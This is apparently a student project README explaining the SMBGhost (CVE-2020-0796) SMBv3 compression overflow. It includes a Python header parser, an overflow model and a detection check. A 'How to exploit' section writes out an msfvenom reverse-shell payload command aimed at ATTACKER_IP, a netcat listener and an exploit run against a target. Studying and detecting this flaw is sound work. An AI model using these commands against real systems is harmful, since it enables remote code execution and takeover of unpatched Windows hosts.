
CVE-2020-0796 PoC: Microsoft SMBv3 buffer error vulnerability

Source
Related vulnerability
Title: Microsoft SMBv3 buffer error vulnerability (CVE-2020-0796)
Description: Microsoft SMBv3 is Microsoft's implementation of Server Message Block 3.1.1, the file and printer sharing protocol built into Windows. A buffer error vulnerability exists in SMBv3: when the protocol handles a malicious compressed packet it enters an erroneous code path. A remote, unauthenticated attacker can exploit the flaw to execute arbitrary code on the target. The following products and versions are affected: Microsoft Windows 10 version 1903, Windows Server version 1903, Windows 10 version 1909, Windo
Description
CVE-2020-0796 explanation and vulnerability research for the CENG325 term project
Introduction
# CVE-2020-0796
CVE-2020-0796 (SMBGhost) explanation and vulnerability research for the CENG325 term project, written for beginners

# How to exploit?

These steps follow the chompie1337 RCE PoC listed below. The PoC targets unpatched 64-bit Windows 10 1903/1909; it is unreliable and can crash the target (BSOD), so run it only against a lab machine you own.

Generate the user-mode reverse-shell payload and paste the Python output into the user payload variable of the exploit script:

```bash
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
```

Start a listener on the attacker machine for the reverse shell:

```bash
nc -lvnp 5555
```

Run the exploit against the target:

```bash
python3 exploit.py -ip TARGET_IP
```

Before testing, confirm the target is actually exposed: the vulnerable code is only reached when SMBv3 compression is enabled, and Microsoft's interim workaround (ADV200005) was to set the DisableCompression registry value under LanmanServer\Parameters to 1 until the KB4551762 update could be installed.
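The bug the PoC above triggers is an integer overflow in the SMBv3 compression transform header: the server summed two attacker-controlled 32-bit fields (OriginalCompressedSegmentSize and Offset) into a 32-bit allocation size without an overflow check, so a tiny buffer was allocated and then overflowed by the copy and decompression that used the original large values. The following added example (not code from this project or from the PoC repositories) builds and parses that header per [MS-SMB2] 2.2.42 and models the unpatched versus patched size arithmetic. The `unpatched_alloc_size` and `patched_alloc_size` functions are simplified models of the srv2.sys logic as described in the public analyses, not the actual driver code, and the sample payload bytes are constructed, not real LZNT1 data.

```python
import struct

# [MS-SMB2] 2.2.42 SMB2 COMPRESSION_TRANSFORM_HEADER (16 bytes), little-endian:
#   ProtocolId (4) = 0xFC534D42, OriginalCompressedSegmentSize (4),
#   CompressionAlgorithm (2), Flags (2), Offset/Length (4)
COMPRESSION_TRANSFORM_ID = 0xFC534D42
HEADER_FMT = "<IIHHI"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 16
ULONG_MAX = 0xFFFFFFFF

ALGORITHMS = {0x0000: "NONE", 0x0001: "LZNT1", 0x0002: "LZ77",
              0x0003: "LZ77+Huffman", 0x0004: "Pattern_V1"}


def build_compression_transform(original_size, algorithm, flags, offset, payload):
    """Serialize a compression transform message: the 16-byte header followed by
    the payload (Offset bytes of uncompressed prefix, then compressed data)."""
    return struct.pack(HEADER_FMT, COMPRESSION_TRANSFORM_ID, original_size,
                       algorithm, flags, offset) + payload


def parse_compression_transform(data):
    """Parse the header fields; raise ValueError if this is not a transform message."""
    if len(data) < HEADER_LEN:
        raise ValueError("short message")
    proto, orig_size, algo, flags, offset = struct.unpack(HEADER_FMT, data[:HEADER_LEN])
    if proto != COMPRESSION_TRANSFORM_ID:
        raise ValueError("not an SMB2 compression transform header")
    return {"original_size": orig_size, "algorithm": algo, "flags": flags,
            "offset": offset, "payload": data[HEADER_LEN:]}


def unpatched_alloc_size(orig_size, offset):
    """Model (assumption: simplified) of the pre-patch Srv2DecompressData arithmetic:
    the two 32-bit fields are added into a 32-bit length with no overflow check,
    so the allocation wraps while the later copy of Offset bytes and the
    decompression of orig_size bytes still use the large values."""
    return (orig_size + offset) & ULONG_MAX


def patched_alloc_size(orig_size, offset):
    """Model of the fixed behaviour: a sum that overflows 32 bits is rejected."""
    total = orig_size + offset
    if total > ULONG_MAX:
        raise ValueError("OriginalCompressedSegmentSize + Offset overflows 32 bits")
    return total


def is_smbghost_trigger(data):
    """Detection helper for captured SMB traffic: True when a compression transform
    header carries a size/offset pair whose sum wraps, the CVE-2020-0796 trigger."""
    try:
        h = parse_compression_transform(data)
    except ValueError:
        return False
    return h["original_size"] + h["offset"] > ULONG_MAX


# Constructed samples (not real captures). In the malformed one
# 0xFFFFFFFF + 0x10 wraps to 0x0F: the server allocated 15 bytes and then
# copied the 16-byte "uncompressed" prefix into it.
MALFORMED = build_compression_transform(0xFFFFFFFF, 0x0001, 0, 0x10, b"A" * 0x10 + b"\x00")
BENIGN = build_compression_transform(0x100, 0x0001, 0, 0, b"\x00" * 8)

if __name__ == "__main__":
    for name, msg in (("malformed", MALFORMED), ("benign", BENIGN)):
        h = parse_compression_transform(msg)
        print(name, ALGORITHMS.get(h["algorithm"], "?"),
              "unpatched alloc:", hex(unpatched_alloc_size(h["original_size"], h["offset"])),
              "trigger:", is_smbghost_trigger(msg))
```

`is_smbghost_trigger` is the check a detection engineer would run over SMB2 messages whose first four bytes are the compression transform ProtocolId; a legitimate client never needs the two fields to sum past 32 bits, so the condition has essentially no false positives.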

# PoC Repos
- https://github.com/chompie1337/SMBGhost_RCE_PoC
- https://github.com/ollypwn/SMBGhost

# References
1. Tenable. (2020, March 13). CVE-2020-0796: "Wormable" Remote Code Execution Vulnerability in Microsoft Server Message Block. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
2. Ricerca Security. (2020, April 20). "I'll ask your body": SMBGhost pre-auth RCE abusing Direct Memory Access structs. https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
3. FortiGuard Labs. (2020, March 12). CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server. Fortinet Blog. https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
4. Knownsec 404 Team. (2020, April 2). CVE-2020-0796 Windows SMBv3 LPE Exploit POC Analysis. Medium. https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
5. Cyber Threat Insider Blog. (2020). CVE-2020-0796. https://blog.sensecy.com/tag/cve-2020-0796/



# Project Members
- [ezginurr](https://github.com/ezginurr)
- [zehrosh](https://github.com/zehrosh)
- [busracagliyan](https://github.com/busracagliyan)